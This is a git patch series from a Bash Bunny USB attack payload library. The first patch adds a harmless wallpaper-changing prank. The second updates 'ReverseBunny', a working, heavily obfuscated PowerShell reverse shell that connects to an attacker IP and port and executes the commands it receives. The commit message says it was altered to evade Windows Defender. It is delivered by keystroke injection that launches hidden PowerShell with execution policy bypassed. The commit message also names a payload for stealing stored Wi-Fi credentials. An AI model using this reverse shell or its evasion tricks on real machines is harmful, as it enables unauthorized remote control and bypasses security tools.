From 78eb6e38282e537ddea4cfeee77f7a907c91edea Mon Sep 17 00:00:00 2001 From: xhico <31449326+xhico@users.noreply.github.com> Date: Sat, 2 Oct 2021 19:25:34 +0100 Subject: [PATCH 1/2] Wallpaper Changer (#245) --- .../prank/WallpaperChanger/payload.txt | 43 ++++++++++++++++++ payloads/library/prank/WallpaperChanger/s.ps1 | 10 ++++ payloads/library/prank/WallpaperChanger/w.png | Bin 0 -> 3211 bytes 3 files changed, 53 insertions(+) create mode 100644 payloads/library/prank/WallpaperChanger/payload.txt create mode 100644 payloads/library/prank/WallpaperChanger/s.ps1 create mode 100644 payloads/library/prank/WallpaperChanger/w.png diff --git a/payloads/library/prank/WallpaperChanger/payload.txt b/payloads/library/prank/WallpaperChanger/payload.txt new file mode 100644 index 00000000..daf073d0 --- /dev/null +++ b/payloads/library/prank/WallpaperChanger/payload.txt @@ -0,0 +1,43 @@ +#!/bin/bash +# +# Title: Change windows wallpaper +# Author: xhico +# Version: 1.0 +# Target: Windows +# +# Changes the users wallpaper from the ${SWITCH_POSITION} folder +# in the payloads library of the Bash Bunny USB Disk partition. +# +# Colors: +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL | Red slow blink | Could not find the wallpaper file | +# | ATTACK | Yellow single blink | Running the Powershell Script | +# | FINISH | Green blink followed by SOLID | Script is finished | + +# Magenta solid +LED SETUP + +# Get the switch position +GET SWITCH_POSITION +PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION + +# Check for w.png s.ps1 files +if [[ ! -f ${PAYLOAD_DIR}/w.png || ! -f ${PAYLOAD_DIR}/s.ps1 ]]; then + LED FAIL + exit 1 +fi + +# Set the attack mode to HID and STORAGE +ATTACKMODE HID STORAGE + +# Yellow single blink +LED ATTACK + +# Run the command to change the wallpaper +RUN WIN powershell ".((gwmi win32_volume -f 'label=''BASHBUNNY''').Name+'payloads\\$SWITCH_POSITION\s.ps1') \"((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\w.png')\"" + + +# Green LED for finished +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/WallpaperChanger/s.ps1 b/payloads/library/prank/WallpaperChanger/s.ps1 new file mode 100644 index 00000000..fdc80206 --- /dev/null +++ b/payloads/library/prank/WallpaperChanger/s.ps1 @@ -0,0 +1,10 @@ +# Receives the path for the wallpaper file from the Bunnys Playload Dir +Param([string]$Path) + +# Sets the new wallpaper path to the desktop +# Copies the file from the Playload Dir to the Users Desktop +$new_path = "$env:USERPROFILE\Desktop\w.png" +cp $Path $new_path + +#Sets the wallpaper +Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value $new_path \ No newline at end of file diff --git a/payloads/library/prank/WallpaperChanger/w.png b/payloads/library/prank/WallpaperChanger/w.png new file mode 100644 index 0000000000000000000000000000000000000000..6cc3b27881594206cd7442e0aeab419600616af5 GIT binary patch literal 3211 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 Date: Sat, 2 Oct 2021 21:58:58 +0200 Subject: [PATCH 2/2] Updated ReverseBunny (#469) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md --- .../remote_access/ReverseBunny/README.md | 5 +- .../ReverseBunny/ReverseBunny.txt | 2 +- .../remote_access/ReverseBunny/payload.txt | 51 ++++++++++++++----- 3 files changed, 40 insertions(+), 18 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 7f478362..ba8e344e 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -6,7 +6,4 @@ Version: 1.0 Getting remote access via obfuscated reverse shell. -ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. - -# Red.............Payload running -# Green .............Finished +RevBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt index 1aa4f158..65d50681 100644 --- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt +++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt @@ -1 +1 @@ -$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( 'PZJhb+IwDIb/Sj70lkSDiHHiPgzdpLbrpmq7DtFIpxNCcqHW6CgF0Uys6vLfzwlsH9pGdvy+fuwGfVxDCkljLPvNlOAZnvg1H76s6P2Ga8Mly7vW4E5laFS+X2/RtErHs7iusDEi6FM42EHQz2A/N1ZOgz7XMMfwjxMMSD4FumfVI5rcHLHYCTldrDqDi+Uy6KNOA7bu6kipX5PJz8nnleA/uOxHdnraVDUKZ3HWag0JAymrORYlxVcdaMztgI0GlF5BZ5LcqmdsXs1GSjZskI1kTy2VIejQiQhSzwgNT4T45g4ecai7A2bFDr9gNX4YFeZxmibNel9Wzau8ENDROcM/A87aO6dnbszgPoIw3nonGmaF5PBB+t8djO+ubtgnoy5e3s2Qsjk9XpRueRFIICshKuLt2LIzNkW+dK8Zn+WM09fpH6j4VHIp1awwG5e8Y3x6qYAIOo2+lYVxOHghWd7eejJPFNEmWnEuKZ0JPI09TUtbTPyw/x4rg8K1htk9gevEYTteyIBqaOrfQ/frP0IS7qx6qN/bjZCWYvEzVPQbaKviet+ikP8B' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'') \ No newline at end of file +$bb =(gwmi win32_volume -f 'label=''BashBunny''').Name;$IP='0.0.0.0';$PORT=4444;Start-Sleep 5;New-Item -ItemType file $bb"DONE";;(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");${J`F5Z6}= [typE]("{3}{4}{1}{2}{0}"-f'INg',("{0}{1}" -f'XT.','eN'),'cOD','T','e'); ${clI`e`Nt} = &("{1}{0}{3}{2}" -f 'ew','N','t',("{0}{1}"-f ("{0}{1}"-f'-O','bj'),'ec')) ("{2}{7}{1}{3}{0}{6}{5}{8}{4}" -f("{1}{0}"-f '.T',("{0}{1}"-f 'ke','ts')),'.','Sys',("{0}{1}"-f 'Net',("{1}{0}" -f'Soc','.')),'nt','PCl','C','tem','ie')(${IP},${pO`RT});${st`ReAm} = ${c`l`iENT}.("{2}{0}{1}{3}"-f'e',("{0}{1}" -f 'tSt','r'),'G','eam')."I`N`Voke"();[byte[]]${by`T`es} = 0..65535|.('%'){0};while((${i} = ${stRe`AM}.("{1}{0}" -f 'ad','Re')."InVO`KE"(${B`y`TES}, 0, ${BYt`eS}."LEn`GTh")) -ne 0){;${D`ATA} = (.("{3}{1}{2}{0}" -f ("{0}{1}"-f 'je','ct'),'w-','Ob','Ne') -TypeName ("{6}{5}{0}{4}{2}{3}{7}{1}"-f 'st',("{0}{1}" -f 'di','ng'),("{1}{0}"-f ("{1}{0}" -f't.A','Tex'),'.'),("{1}{0}" -f'E',("{1}{0}" -f'II','SC')),'em','y','S','nco'))."Ge`Ts`Tr`inG"(${BYt`ES},0, ${I});${Se`N`DbAck} = (.("{1}{0}" -f'ex','i') ${d`AtA} 2>&1 | &("{1}{0}{2}" -f'ut','O',("{0}{1}" -f '-',("{2}{0}{1}" -f 't',("{1}{0}" -f'g','rin'),'S'))) );${Send`B`Ac`K2} = ${sEn`DBack} + 'PS ' + (.("{1}{0}"-f 'wd','p'))."P`ATh" + '> ';${sEN`dB`yTE} = ( ${j`F`5Z6}::"AS`CIi").("{1}{0}{2}"-f 't','Ge',("{0}{1}" -f 'By','tes'))."I`NvoKE"(${s`e`NdBA`Ck2});${str`e`AM}.("{0}{1}"-f 'W',("{0}{1}" -f'r','ite'))."In`VOke"(${Send`BYtE},0,${Send`BYtE}."lE`N`gTh");${s`Tr`eaM}.("{1}{0}" -f 'ush','Fl')."inV`oKe"()};${ClI`E`Nt}.("{1}{0}" -f 'se','Clo')."iNV`O`KE"(); diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 7f45b871..945fac51 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -1,30 +1,55 @@ +#!/bin/bash +# # Title: ReverseBunny -# Description: Obfuscated reverse shell, executed via powershell +# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.0 -# Category: Execution +# Version: 1.1 +# Category: Remote_Access # Attackmodes: HID, Storage +LED SETUP + GET SWITCH_POSITION -ATTACKMODE HID STORAGE DUCKY_LANG de -#LED RED - DON'T EJECT - PAYLOAD RUNNING +rm /root/udisk/DONE -LED R FAST +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 DELAY 5000 -RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 2000 +RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass" +DELAY 6000 -Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))" -DELAY 5000 +Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))" +DELAY 10000 Q ENTER -DELAY 5000 +DELAY 10000 Q CONTROL v -DELAY 5000 +DELAY 10000 Q ENTER +DELAY 1000 + +LED STAGE2 + +until [ -f /root/udisk/DONE ] + do + sleep 0.2 +done + +LED CLEANUP + +rm /root/udisk/DONE + +DELAY 100 + +sync + +DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT